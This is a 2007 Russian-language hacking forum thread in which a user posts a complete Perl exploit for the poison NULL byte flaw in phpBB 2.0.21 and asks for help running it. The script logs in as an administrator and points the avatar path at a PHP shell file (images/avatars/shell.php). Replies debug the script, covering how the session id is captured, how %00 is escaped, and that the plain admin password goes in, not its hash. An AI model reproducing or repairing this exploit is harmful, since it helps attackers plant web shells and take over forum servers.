Траблы со сплоитом для phpBB 2.0.21

Юличка · 24 May 2007

Народ у меня на локалке форум phpBB 2.0.21 стоит путь http://server/index.php

узаю этот сплоит

#!/usr/bin/perl -w
# Author: ShAnKaR
# Title: multiple PHP application poison NULL byte vulnerability
# Applications: phpBB 2.0.21, punBB 1.2.12
# Threat Level: Critical
# Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
#
# Poison NULL byte vulnerability for perl CGI applications was described
# in [1]. ShAnKaR noted, that same vulnerability also affects different
# PHP applications. An example of vulnerable applications are phpBB and
# punBB.
#
# Vulnerability can be used to upload or replace arbitrary files on
# server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename.
#
# In case of phpBB and punBB vulnerability can be exploited by changing
# location of avatar file and uploading avatar file with PHP code in EXIF
# data.
#
# A PoC exploit to change Avatar file location for phpBB:
#
#

use HTTP::Cookies;
use LWP;
use URI::Escape;
unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());

$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);

$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);

$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}

# milw0rm.com [2006-09-11]
Click to expand...

пишу в ком.строке
c:\PERL\bin\perl.exe c:\phpbb.pl http://server/ 44c59e4934c79044faa953ad91bf7f45 images/avatars/shell.php

а мне в ответ это пишет:
Use of uninitialized value in concatenation (.) or string at c:\phpbb.pl line 52
.
Use of uninitialized value in concatenation (.) or string at c:\phpbb.pl line 53
.

что не то помогите плз!

Gh0s7 · 24 May 2007

Однако. Это бага специально видимо =\
Code:
$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
В первой строке скорее всего должен быть sid.
Во второй %00 интерпретируется как хэш, меняй на "\%00" или '%00'.
Как автор выдергивает сид я хз, мб в пхпбб бордах это хэш пасса, тогда $ARGV[1], если нет, то хз =\
Влом чекать.

ShAnKaR · 28 May 2007

на писано ж:

./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php
Click to expand...

это переводится как юзай admin pass а не хеш , Юличка

Траблы со сплоитом для phpBB 2.0.21

Юличка New Member

Gh0s7 Elder - Старейшина

ShAnKaR Пачка маргарина

Useful Searches

Траблы со сплоитом для phpBB 2.0.21

Юличка New Member

Gh0s7 Elder - Старейшина

ShAnKaR Пачка маргарина